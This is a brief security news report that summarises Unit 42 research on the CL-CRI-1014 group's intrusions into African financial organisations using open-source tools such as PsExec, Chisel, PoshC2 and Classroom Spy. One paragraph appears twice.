Intrusions involving open-source tools have been launched by the CL-CRI-1014 threat operation to infiltrate financial organizations across Africa over the past two years, Infosecurity Magazine reports.
As part of its most recent campaign, CL-CRI-1014 leveraged PsExec to establish connections with another machine, which is then injected with the Chisel tunneling utility to circumvent firewall defenses and facilitate further machine compromise, according to an analysis from Palo Alto Networks Unit 42 researchers. Attackers then used PsExec to deploy either the PoshC2 attack framework for reconnaissance or execute PowerShell for the installation of the Classroom Spy remote administration tool, which superseded the MeshAgent tool in previous attacks. With Classroom Spy, CL-CRI-1014 was able to perform not only live computer screen monitoring, webpage logging, keylogging, audio recording, and file exfiltration, but also conduct system data gathering, terminal opening, and app tracking and blocking, said researchers, who also noted attackers' subsequent use of packers and other techniques to bypass detection.
As part of its most recent campaign, CL-CRI-1014 leveraged PsExec to establish connections with another machine, which is then injected with the Chisel tunneling utility to circumvent firewall defenses and facilitate further machine compromise, according to an analysis from Palo Alto Networks Unit 42 researchers. Attackers then used PsExec to deploy either the PoshC2 attack framework for reconnaissance or execute PowerShell for the installation of the Classroom Spy remote administration tool, which superseded the MeshAgent tool in previous attacks. With Classroom Spy, CL-CRI-1014 was able to perform not only live computer screen monitoring, webpage logging, keylogging, audio recording, and file exfiltration, but also conduct system data gathering, terminal opening, and app tracking and blocking, said researchers, who also noted attackers' subsequent use of packers and other techniques to bypass detection.
